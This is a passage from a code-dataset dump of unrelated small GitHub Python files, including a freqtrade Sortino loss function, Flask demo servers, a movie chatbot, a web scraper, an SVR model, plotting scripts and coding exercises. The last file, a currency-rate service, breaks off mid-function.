hyperopt.\n\n This implementation uses the Sortino Ratio calculation.\n \"\"\"\n\n @staticmethod\n def hyperopt_loss_function(results: DataFrame, trade_count: int,\n min_date: datetime, max_date: datetime,\n *args, **kwargs) -> float:\n \"\"\"\n Objective function, returns smaller number for more optimal results.\n\n Uses Sortino Ratio calculation.\n\n Sortino Ratio calculated as described in\n http://www.redrockcapital.com/Sortino__A__Sharper__Ratio_Red_Rock_Capital.pdf\n \"\"\"\n resample_freq = '1D'\n slippage_per_trade_ratio = 0.0005\n days_in_year = 365\n minimum_acceptable_return = 0.0\n\n # apply slippage per trade to profit_ratio\n results.loc[:, 'profit_ratio_after_slippage'] = \\\n results['profit_ratio'] - slippage_per_trade_ratio\n\n # create the index within the min_date and end max_date\n t_index = date_range(start=min_date, end=max_date, freq=resample_freq,\n normalize=True)\n\n sum_daily = (\n results.resample(resample_freq, on='close_date').agg(\n {\"profit_ratio_after_slippage\": 'sum'}).reindex(t_index).fillna(0)\n )\n\n total_profit = sum_daily[\"profit_ratio_after_slippage\"] - minimum_acceptable_return\n expected_returns_mean = total_profit.mean()\n\n sum_daily['downside_returns'] = 0.0\n sum_daily.loc[total_profit < 0, 'downside_returns'] = total_profit\n total_downside = sum_daily['downside_returns']\n # Here total_downside contains min(0, P - MAR) values,\n # where P = sum_daily[\"profit_ratio_after_slippage\"]\n down_stdev = math.sqrt((total_downside**2).sum() / len(total_downside))\n\n if down_stdev != 0:\n sortino_ratio = expected_returns_mean / down_stdev * math.sqrt(days_in_year)\n else:\n # Define high (negative) sortino ratio to be clear that this is NOT optimal.\n sortino_ratio = -20.\n\n # print(t_index, sum_daily, total_profit)\n # print(minimum_acceptable_return, expected_returns_mean, down_stdev, sortino_ratio)\n return -sortino_ratio\n","repo_name":"freqtrade/freqtrade","sub_path":"freqtrade/optimize/hyperopt_loss/hyperopt_loss_sortino_daily.py","file_name":"hyperopt_loss_sortino_daily.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":23465,"dataset":"github-code","pt":"94"} +{"seq_id":"40275317285","text":"from utilities.file_utils import get_folder_path, get_files, save_excel\nfrom utilities.photo_data import get_photo_data\n\n\ndef main():\n folder_path = get_folder_path()\n\n # get all .jpg files from folder\n photo_files = get_files(folder_path, name_filter=\".jpg\")\n\n if not photo_files:\n print(f\"I couldn't find any photos in this folder: {folder_path}\")\n return\n\n # send files to photo_data\n photo_data_list = get_photo_data(photo_files)\n\n # save excel file\n save_excel(photo_data_list, folder_path)\n\n\nif __name__ == '__main__':\n main()","repo_name":"robertvari/python_alapok_211106_2","sub_path":"Photo_To_Excel/PhotoToExcel.py","file_name":"PhotoToExcel.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"36845357550","text":"import requests\nimport random\nimport math\nimport json\nfrom flask import Flask, request, abort\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\ndef within_range(num):\n if num in range(10000, 999999):\n return True\n else:\n return False\n\n\n#Get array of quantum numbers combine into long seed\ndef quantum_seed():\n res = requests.get(\"http://qrng.anu.edu.au/API/jsonI.php?length=8&type=uint16\")\n json = res.json()\n val = [str(i) for i in json[\"data\"] ]\n return int(\"\".join(val))\n\n\ndef gauss(mu, sigma, seed):\n #Pass seed from API call\n random.seed(seed)\n gauss_next = None\n z = gauss_next\n if z is None:\n x2pi = random.random() * math.tau \n g2rad = math.sqrt(-2.0 * math.log(1.0 - random.random()))\n z = math.cos(x2pi) * g2rad\n gauss_next = math.sin(x2pi) * g2rad\n\n return mu + z * sigma\n\ndef trim(lat, lon):\n #Round numbers to nearest hundreth thousand then multiply\n return {\n \"latitude\": int(round(lat, 6) * 1000000),\n \"longitude\": int(round(lon, 6) * 1000000)\n }\n\n\n@app.route(\"/location\")\ndef location():\n mean = float(request.args.get(\"mean\"))\n if within_range(mean):\n v = 1000000.0 #Constant for dividing to nearest hundred thousandths place\n coords = trim(float(request.args.get(\"latitude\")), float(request.args.get(\"longitude\")))\n latitude = float(gauss(coords[\"latitude\"], mean, quantum_seed()))\n longitude = float(gauss(coords[\"longitude\"], mean, quantum_seed()))\n \n return ({\n \"success\": True,\n \"latitude\": latitude / v,\n \"longitude\": longitude / v,\n })\n else:\n abort(400, {\n \"success\": False,\n \"message\": \"bad request, check your parameters\",\n })\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"CodyCline/random_maps","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39844546148","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 05:31:07 2019\n\n@author: glavigna\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef generador_senoidal (fs, f0, N, a0=1, p0=0):\n \n ts = 1/fs # tiempo de muestreo \n \n #Genero el espacio para poder tener el espacio temporal que va de 0 a N-1\n #Flatten convierte a un array de 1 dimensión.\n tt = np.linspace(0, (N-1)*ts, N).flatten()\n \n # Concatenación de matrices:\n # guardaremos las señales creadas al ir poblando la siguiente matriz vacía\n signal = np.array([], dtype=np.float).reshape(N,0)\n \n #Genero la senoidal\n signal = a0 * np.sin(2 * np.pi * f0 * tt + p0);\n \n return tt,signal\n\nsenoidal = generador_senoidal(fs = 1000, f0 = 500, N = 1000, a0 = 1, p0 = (np.pi)/2);\n\nplt.figure(1)\nline_hdls = plt.stem(senoidal[0], senoidal[1])\nplt.title('Señal: ' + 'Senoidal')\nplt.xlabel('tiempo [segundos]')\nplt.ylabel('Amplitud [V]')\n \nplt.show()","repo_name":"gonzalolavigna/mese_2018_pds","sub_path":"generar_senoildal_tb.py","file_name":"generar_senoildal_tb.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5139911874","text":"from nltk.tokenize import word_tokenize\nimport json\nfrom flask import Flask, request, jsonify,render_template, url_for\nimport numpy\nimport pickle\nimport requests\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\nflag = 0\n@app.route('/api',methods=['POST','GET'])\ndef hello():\n\t\n\tx1 = []\n\tmodel = pickle.load(open('func.pkl','rb'))\n\tdata = request.get_json(force = True)\n\tif(data['type']==\"text\"):\n\t\tz = chatbot(data['moviename'])\n\t\treturn jsonify(z)\n\telse:\n\t\ttry: \n\t\t prediction = model(data['moviename'])\n\t\t if(prediction.size>0):\n\t\t \tfor i in prediction:\n\t\t \t\tx1.append(i)\n\t\t \toutput1 = {'name1' : x1,'type' : 'movie1'}\n\t\t \treturn jsonify(output1)\n\t\t else:\n\t\t \treturn jsonify(chatbot(\"Not in DB\"))\n\n\n\t\texcept KeyError:\n\t\t\treturn jsonify(chatbot(\"Not in DB\"))\n\n\t\texcept TypeError:\n\t\t\treturn jsonify(chatbot(\"Not in DB\"))\t\n\ndef chatbot(l):\n\tmovie = ['movie', 'movies', 'films', 'film']\n\tgreet = ['hey','hello','hi','hii','hiii','heyy','heyo']\n\tthank = ['thanks','thankyou', 'thank you','thenks','thank you','thank','bye']\n\n\tif(l == \"Not in DB\"):\n\t\treturn({\"name1\":\"Sorry this movie is not in my database\",\"type\":\"text\"})\n\n\tl = l.lower()\n\ts = word_tokenize(l)\n\tfor i in range(len(s)):\n\t\tfor j in range(len(movie)):\n\t\t\tif(s[i] == movie[j]):\n\t\t\t\treturn({\"name1\":\"Please tell me a movie name you like, this would help me give you personalized recommendations.\",\"type\":\"movie\"})\n\t \n\t\tfor j in range(len(greet)):\n\t\t\tif(s[i]==greet[j]):\n\t\t\t\treturn({\"name1\":\"Hi Human! How can I help?\",\"type\":\"text\"})\n\t \n\t\tfor j in range(len(thank)):\n\t\t\tif(s[i]==thank[j]):\n\t\t\t\treturn({\"name1\":\"Glad to help!\"})\n\n\t\t\t\n\treturn({\"name1\":\"I am not trained yet for that! Please try again\",\"type\":\"text\"})\n \n\n\n\nif __name__ == '__main__':\n\tapp.run(port=5000, debug=True)\n","repo_name":"govesnaman/MovieBot","sub_path":"customserver.py","file_name":"customserver.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23031408670","text":"lista = list()\r\nwhile True:\r\n n = int(input('Digite um valor: '))\r\n if n in lista:\r\n print('\\033[31mEsse número já foi adicionado anteriormente!\\033[m')\r\n else:\r\n lista.append(n)\r\n print('\\033[32mNúmero adicionado com sucesso!\\033[m')\r\n while True:\r\n op = str(input('Deseja inserir outro valor [ S / N ]: ')).strip().upper()[0]\r\n if op in 'SN':\r\n break\r\n else:\r\n print('\\033[31mNão digitou uma opção válida. Tente novamente!\\033[m')\r\n if op == 'N':\r\n break\r\nprint('-='*30)\r\nlista.sort()\r\nprint('Você digitou os números (em ordem crescente) :', end='')\r\nfor c in lista:\r\n print(f'{c} ... ', end='')\r\n","repo_name":"felipebbarreto/CursoemvideoPython","sub_path":"ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44685830660","text":"\"\"\"\n\nimportant in the interpolationSearch\n\n pos = lo + ((hi - lo) // (arr[hi] - arr[lo]) *\n (x - arr[lo]))\n \n \n \n \n\"\"\"\n\n\n\n\n \ndef interpolationSearch(arr, lo, hi, x):\n \n # Since array is sorted, an element present\n # in array must be in range defined by corner\n if (lo <= hi and x >= arr[lo] and x <= arr[hi]):\n \n # Probing the position with keeping\n # uniform distribution in mind.\n pos = lo + ((hi - lo) // (arr[hi] - arr[lo]) *\n (x - arr[lo]))\n \n # Condition of target found\n if arr[pos] == x:\n return pos\n \n # If x is larger, x is in right subarray\n if arr[pos] < x:\n return interpolationSearch(arr, pos + 1,\n hi, x)\n \n # If x is smaller, x is in left subarray\n if arr[pos] > x:\n return interpolationSearch(arr, lo,\n pos - 1, x)\n return -1\n \n\n\n\n\n \na = [1,2,3,4,5,6,7,8,9,10,12,13] \nx = 12\nn = len(a)\ni = interpolationSearch(a , 0, n-1, x)\nprint(a[i],i)\n\n\n \n \n ","repo_name":"udayhacks/DSA","sub_path":"algorithms/interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18814155735","text":"# SVR model\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Car_Purchasing_Data.csv' , encoding='ISO-8859-1')\r\nX = dataset.iloc[:, 2:-1].values\r\ny = dataset.iloc[:, -1].values\r\ny = y.reshape(-1,1)\r\n\r\n# Encoding the Independent Variable\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle = LabelEncoder()\r\nX[:,0] = le.fit_transform(X[:,0])\r\n\r\n# Splitting data into test set and training set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\ny_train = sc_y.fit_transform(y_train)\r\ny_test = sc_y.transform(y_test)\r\n\r\n# Training the SVR model on the whole dataset\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel = 'linear')\r\nregressor.fit(X_train, y_train)\r\n\r\ny_pred = sc_y.inverse_transform(regressor.predict(X_test))\r\nX_test = sc_X.inverse_transform(X_test)\r\n","repo_name":"deepanshu79/Prediction-of-car-purchase-amount","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35572584102","text":"import mysql.connector, json, csv\n\nuserFile = 'C:/Users/lifeiteng/projects/visualizer/getRank/user data/user.json'\n\n\nwith open(userFile) as json_file:\n user_data = json.load(json_file)\n\n# text = []\n\n # text.append(row)\n\nuserFileCSV = 'C:/Users/lifeiteng/projects/visualizer/getRank/user data/user.csv'\n\nidx = 1\nwith open(userFileCSV, 'w', newline = '', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n for user_name in user_data:\n for contest in user_data[user_name]:\n rank = user_data[user_name][contest]\n # print('%s %d %d' % (user_name, contest, rank))\n writer.writerow([idx, user_name, contest, rank])\n idx += 1\n","repo_name":"feiteng/webcrawlerdemo","sub_path":"getRank/code/methods/[Data] JSON_SaveToCSV.py","file_name":"[Data] JSON_SaveToCSV.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1515131579","text":"# Input: s = \"leetcode\", wordDict = [\"leet\",\"code\"]\n# Output: true\n# Explanation: Return true because \"leetcode\" can be segmented as \"leet code\".\n\ndef wordBreak(s,wordDict):\n word_set=set(wordDict)\n n=len(s)\n dp=[False]*(n+1)\n dp[0]=True\n for i in range(1,n+1):\n for j in range(i):\n if dp[j] and s[j:i] in word_set:\n dp[i]=True\n break\n return dp[n]\n\ns = \"leetcode\"\nwordDict = [\"leet\",\"code\"]\nprint(wordBreak(s,wordDict))","repo_name":"Abhidharsh-subhash/workout-problems","sub_path":"139.py","file_name":"139.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71061233271","text":"from django.shortcuts import render\nimport requests\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\ndef home(request):\n if request.method==\"POST\":\n url=request.POST.get('url', '')\n dom_type = request.POST.get('domType', '') \n class_name = request.POST.get('class', '') \n pdom_type = request.POST.get('pdomType', '') \n pclass_name = request.POST.get('pclass', '') \n '''get response'''\n\n response= requests.get(url)\n #check whether the there is connection\n \n if response.status_code==200:#if the connection is successful\n #get soup\n soup=BeautifulSoup(response.content, \"html.parser\")\n #get prices and vehicle names based on data provided\n vehicle_name=soup.find_all(dom_type, class_=class_name)\n vehicle_price = soup.find_all(pdom_type, class_=pclass_name)\n cars=[]\n car_prices=[]\n for name_element, price_element in zip(vehicle_name, vehicle_price):\n name = name_element.get_text(strip=True)\n p = price_element.get_text(strip=True)\n cars.append(name)\n car_prices.append(p)\n re=zip(cars,car_prices)\n \n\n\n \n context={\"url\":url, \"myzip\":re,\"vehicles\": cars, \"prices\": car_prices}\n return render(request, 'app/index.html', context)\n else:\n msg=\"Failed to fetch the page:\"\n return render(request, \"app/index.html\", {\"msg\":msg})\n else:\n return render(request, \"app/index.html\")","repo_name":"wjenaro/webscraping","sub_path":"Webscraping with an interface- django/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34249222458","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nimport matplotlib.ticker as ticker\n#plt.xkcd()\n\nfreq_2=0.2\nperiod_2=1/freq_2\n\nstep2_raw_g6=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step2-group-6.csv\")\nremove_zero=step2_raw_g6.loc[203:,:]\n\nstep2_g6_half_cycle=remove_zero[remove_zero.TimeStamp<=period_2/2]\nstep2_g6_half_cycle.tail()\nstep2_g6_half_cycle.reset_index(drop=True, inplace=True)\nstep2_g6_half_cycle[\"TimeShift\"]=step2_g6_half_cycle.TimeStamp-step2_g6_half_cycle.TimeStamp[0]\n\nstep6_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step6-group-6.csv\")\nstep6_half_cycle=step6_raw[(step6_raw.TimeStamp>=20.24) & (step6_raw.TimeStamp<=22.29)]\nstep6_half_cycle.reset_index(drop=True, inplace=True)\nstep6_half_cycle[\"TimeShift\"]=step6_half_cycle.TimeStamp-step6_half_cycle.TimeStamp[0]\n\n\nstep7_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step7-group-4.csv\")\nstep7_fil=step7_raw.loc[504:, :]\nstep7_fil.reset_index(drop=True, inplace=True)\nstep7_fil[\"TimeShift\"]=step7_fil.TimeStamp-step7_fil.TimeStamp[0]\nstep7_half_cycle=step7_fil[step7_fil.TimeShift<=period_2/2]\n\n\nfreq_11=0.2\nperiod_11=1/freq_11\nstep11_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step11-group-4.csv\")\nstep11_raw[\"TimeShift\"]=step11_raw.TimeStamp-step11_raw.TimeStamp[0]\n\nstep13_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step13-group-3.csv\")\n\nstep13_raw[\"TimeShift\"]=step13_raw.TimeStamp-step13_raw.TimeStamp[0]\n\nstep18_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step18-group-2.csv\")\nstep18_fil=step18_raw.loc[234:, :]\n\nstep18_fil.reset_index(drop=True, inplace=True)\n\nstep18_fil[\"TimeShift\"]=step18_fil.TimeStamp-step18_fil.TimeStamp[0]\nstep18_half_cycle=step18_fil[step18_fil.TimeShift<=period_2/2]\n\nstep27_raw=pd.read_csv(\"https://raw.githubusercontent.com/sayedul79/python-control-system/main/dataset/exp6-step27-group-4.csv\")\nstep27_fil=step27_raw.loc[0:, :]\n\nstep27_fil.reset_index(drop=True, inplace=True)\n\nstep27_fil[\"TimeShift\"]=step27_fil.TimeStamp-step27_fil.TimeStamp[0]\nstep27_half_cycle=step27_fil[step27_fil.TimeShift<=period_2/2]\n\n\nfont = {'family': 'Times New Roman',\n 'color': 'black',\n 'weight': 'normal',\n 'fontsize': 15,\n }\nfig, ax2=plt.subplots(figsize=(10,6))\nax2.plot(step2_g6_half_cycle.TimeShift, step2_g6_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep2_tex=r\"$f=0.2 Hz$, $A=80\\%$, $K_p=0.14$\"\nax2.text(1.0, 30, step2_tex, fontdict=font, color=\"DarkBlue\")\n\nfig,ax6=plt.subplots(figsize=(10,6))\nc_max=step6_half_cycle.Position.max()\nc_final=step6_half_cycle.Position[step6_half_cycle.Position.shape[0]-1]\nax6.plot(step6_half_cycle.TimeShift, step6_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep6_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=2$\"\nax6.text(1.0, 20, step6_tex, fontdict=font, color=\"DarkBlue\")\n\nax6.scatter([0.09, 0.65], [c_max, c_final], color=\"DarkBlue\")\n\nfig, ax7=plt.subplots(figsize=(10,6))\nax7.plot(step7_half_cycle.TimeShift, step7_half_cycle.Position, color=\"red\", \n linewidth=1.5)\n\nstep7_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=3$\"\nax7.text(1.0, 30, step7_tex, fontdict=font, color=\"DarkBlue\")\n\n#plt.plot(step11_raw.TimeStamp, step11_raw.Position)\nfig, ax11=plt.subplots(figsize=(10,6))\nax11.plot(step11_raw.TimeShift, step11_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax11.plot(step11_raw.TimeShift, step11_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\n\nstep11_tex=r\"$f=0.10 Hz$, $A=10\\%$, $K_p=1.0$\"\nax11.text(2.1, 12, step11_tex, fontdict=font)\n\nfig, ax13=plt.subplots(figsize=(10,6))\nax13.plot(step13_raw.TimeShift, step13_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax13.plot(step13_raw.TimeShift, step13_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\nstep13_tex=r\"$f=0.10 Hz$, $A=10\\%$, $K_p=1.75$\"\nax13.text(0.5, -15, step13_tex, fontdict=font)\n\nfig, ax18=plt.subplots(figsize=(10, 6))\n\nax18.plot(step18_half_cycle.TimeShift, step18_half_cycle.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax18.plot(step18_half_cycle.TimeShift, step18_half_cycle.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\nstep18_tex=r\"$f=0.2 Hz$, $A=15\\%$, $K_p=0.9$\"\nax18.text(0.5, -15, step13_tex, fontdict=font)\n\nfig27, ax27=plt.subplots(figsize=(10,6))\nax27.plot(step27_raw.TimeStamp, step27_raw.Reference, color=\"DarkBlue\", \n linewidth=1.5, \n label=\"Reference\")\nax27.plot(step27_raw.TimeStamp, step27_raw.Position, color=\"red\", \n linewidth=1.5, \n label=\"Position(%)\")\n\nstep27_tex=r\"$f=0.2 Hz$, $A=20\\%$, $K_p=3.6$\"\nax27.text(40, -10, step27_tex, fontdict=font)\n\nfor ax in [ax2, ax6, ax7, ax11, ax13, ax18, ax27]:\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n\t #ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.set_facecolor(\"#F8E0C1\")\n # Move the left and bottom spines to x = 0 and y = 0, respectively.\n ax.spines[\"left\"].set_position((\"data\", 0))\n ax.spines[\"bottom\"].set_position((\"data\", 0))\n # Hide the top and right spines.\n ax.spines[\"top\"].set_visible(False)\n\n ax.spines[\"right\"].set_visible(False)\n\n ax.plot(1, 0, \">k\", ms=12, transform=ax.get_yaxis_transform(), clip_on=False)\n ax.plot(0, 1, \"^k\", ms=12, transform=ax.get_xaxis_transform(), clip_on=False)\n ax.set_xlabel(xlabel=\"Time\", fontsize=15)\n ax.set_ylabel(ylabel=\"Position(%)\", rotation=\"horizontal\", fontsize=15)\n ax.yaxis.set_label_coords(0.05,1.03)\n ax.xaxis.set_label_coords(1.04,0.0)\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=15)\n ax.xaxis.set_label_coords(1.045,0.3)\n\n\nplt.show()\n\n","repo_name":"sayedul79/python-control-system","sub_path":"angular-position-control-lab-6.py","file_name":"angular-position-control-lab-6.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11702126603","text":"import unittest\nimport numpy as np\n\nimport sys\nsys.path.append('C:\\\\Users\\\\Xinran\\\\Desktop\\\\cnn\\\\src\\\\')\nsys.path.append('C:\\\\Users\\\\Xinran\\\\Desktop\\\\cnn\\\\src\\\\layer\\\\')\n\nfrom net import Net\nfrom fc import FullyConnectedLayer as FC\n\nclass TestNet(unittest.TestCase):\n def test_init(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n\n def test_add_layer(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n\n def test_train_iteration(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n x = np.random.random([1, 3, 5, 5]).reshape(1, -1)\n y = np.array([0])\n loss = n.train_one_iteration(x, y)\n \n def test_fit(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n x = np.random.random([1, 3, 5, 5]).reshape(1, -1)\n y = np.array([0])\n n.fit(x, y, 10)\n \n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"huxinran/cnn","sub_path":"test/net_test.py","file_name":"net_test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1207836787","text":"from string import ascii_lowercase\nfrom sys import stdin,stdout\ninput = lambda : stdin.readline().rstrip()\nprint =lambda x : stdout.write(str(x))\n\nfor _ in range(int(input())):\n n = int(input())\n n = (n*2)+1\n count = {i:0 for i in ascii_lowercase}\n\n # we are only getting the first alphabet that is of odd length\n # this is because the first character occurance will be as follows:\n # 1 + x + y + z + z + x - y [for a 4 long string]\n # when we use association property it becomes:\n # 1 + 2(x + z) \n # therefore we can conclude that the first letter will be of odd decent and other letters will be of even decent.\n\n for i in range(n):\n for j in input():\n count[j] += 1\n\n for i in sorted(count):\n if count[i]&1:\n print(i+\"\\n\")\n break","repo_name":"ironnicko/competitive","sub_path":"ManipulatingHistory.py","file_name":"ManipulatingHistory.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73345926710","text":"import math\n\n\ndef get_distance(t1, f1, t2, f2, a, b):\n if t1 == t2:\n return int(math.fabs(f2 - f1))\n d = int(math.fabs(t1 - t2))\n h = f1\n if f1 > b:\n d += f1 - b\n h = b\n elif f1 < a:\n d += a - f1\n h = a\n if f2 != h:\n d += int(math.fabs(f2 - h))\n return d\n\n\nn, h, a, b, k = map(int, input().split())\nfor i in range(0, k):\n t1, f1, t2, f2 = map(int, input().split())\n print(get_distance(t1, f1, t2, f2, a, b))\n","repo_name":"AishwaryaRK/Code","sub_path":"CodeForces/tower_floor_distance.py","file_name":"tower_floor_distance.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33188999174","text":"# coding=utf-8\nimport datetime\nimport logging\nimport ujson\nfrom flask import Response\nimport pytz\nimport requests\nfrom flask import Blueprint, request, current_app\nfrom sqlalchemy import desc\n\nfrom fx.common import cache\nfrom fx.common import errors\nfrom fx.database.db import session_scope\nfrom fx.models.storage import Transactions\n\nlogger = logging.getLogger(__name__)\n\nbp = Blueprint('fx', __name__)\nhttp_session = requests.session()\n\n\ndef safe_to_float(obj):\n try:\n return float(obj)\n except Exception as e:\n logger.debug(repr(e))\n\n\ndef safe_to_int(obj):\n \"\"\"\n returns the integer value or none\n :param obj:\n :return:\n \"\"\"\n try:\n return int(obj)\n except Exception as e:\n logger.debug(repr(e))\n\n\ndef validate_post_request(data):\n \"\"\"\n validates the request body. It should probably reside somewhere else\n :param data:\n :return: tuple . data and error if there is any.\n \"\"\"\n\n # we could look in all currency symbols to make it better, but I don't have all the symbols available\n resp = {}\n if \"currency\" in data and type(data[\"currency\"]) is str and len(data[\"currency\"]) == 3:\n resp[\"currency\"] = data[\"currency\"].upper()\n else:\n return None, errors.INVALID_SYMBOL\n\n if \"amount\" in data and type(safe_to_float(data[\"amount\"])) in (int, float):\n resp[\"amount\"] = safe_to_float(data[\"amount\"])\n else:\n return None, errors.INVALID_AMOUNT\n\n return resp, None\n\n\ndef validate_get_request(data):\n \"\"\"\n validates the GET request\n :param data:\n :return:\n \"\"\"\n\n # we could look in all currency symbols to make it better, but I don't have all the symbols available\n resp = {}\n if \"currency\" in data and type(data[\"currency\"]) is str and len(data[\"currency\"]) == 3:\n resp[\"currency\"] = data[\"currency\"].upper()\n elif \"currency\" in data:\n return None, errors.INVALID_SYMBOL\n\n if \"limit\" in data and type(safe_to_int(data[\"limit\"])) is int:\n resp[\"limit\"] = safe_to_int(data[\"limit\"])\n elif \"limit\" in data:\n return None, errors.INVALID_AMOUNT\n\n return resp, None\n\n\n@bp.route('/grab_and_save', methods=[\"POST\"])\ndef save_rate():\n try:\n if request.is_json is False:\n return Response(ujson.dumps(errors.BAD_REQUEST), 400, content_type='application/json')\n\n data, error = validate_post_request(request.json)\n if error:\n return Response(ujson.dumps(error), 400, content_type='application/json')\n\n currency = data.get(\"currency\").upper()\n amount = data.get(\"amount\")\n\n oxr_resp = http_session.get(url=\"{}&symbols={}&pretty_print=false\".format(current_app.config[\"OPENEXCHANGE_URL\"],\n currency))\n oxr_data = oxr_resp.json()\n\n with session_scope() as session:\n # save to the database\n st = Transactions(\n currency=currency,\n amount=amount,\n rate=oxr_data[\"rates\"][currency],\n rate_at=pytz.utc.localize(datetime.datetime.utcfromtimestamp(oxr_data[\"timestamp\"])),\n created_at=pytz.utc.localize(datetime.datetime.utcnow()))\n st.amount_usd = round(amount * oxr_data[\"rates\"][currency], 9)\n\n session.add(st)\n session.commit()\n\n # write to redis\n cache.save_to_redis({\n \"currency\": currency,\n \"amount_usd\": st.amount_usd,\n \"amount\": st.amount,\n \"rate_at\": st.rate_at,\n \"rate\": st.rate,\n \"created_at\": st.created_at,\n })\n\n return Response(\"{}\", 201, content_type='application/json')\n\n except Exception as e:\n logger.exception(e)\n return Response(ujson.dumps(errors.INTERNAL_SERVER_ERROR), 500, content_type='application/json')\n\ndef make_dict(storage_obj):\n \"\"\"\n\n :param storage_obj:\n :return:\n \"\"\"\n resp = dict()\n resp[\"created_at\"] = storage_obj.created_at\n resp[\"created_at\"] = storage_obj.created_at\n resp[\"rate\"] = storage_obj.rate\n resp[\"rate_at\"] = storage_obj.rate_at\n resp[\"currency\"] = storage_obj.currency\n resp[\"amount\"] = storage_obj.amount\n resp[\"amount_usd\"] = storage_obj.amount_usd\n\n return resp\n\n\n@bp.route('/last', methods=[\"GET\"])\ndef 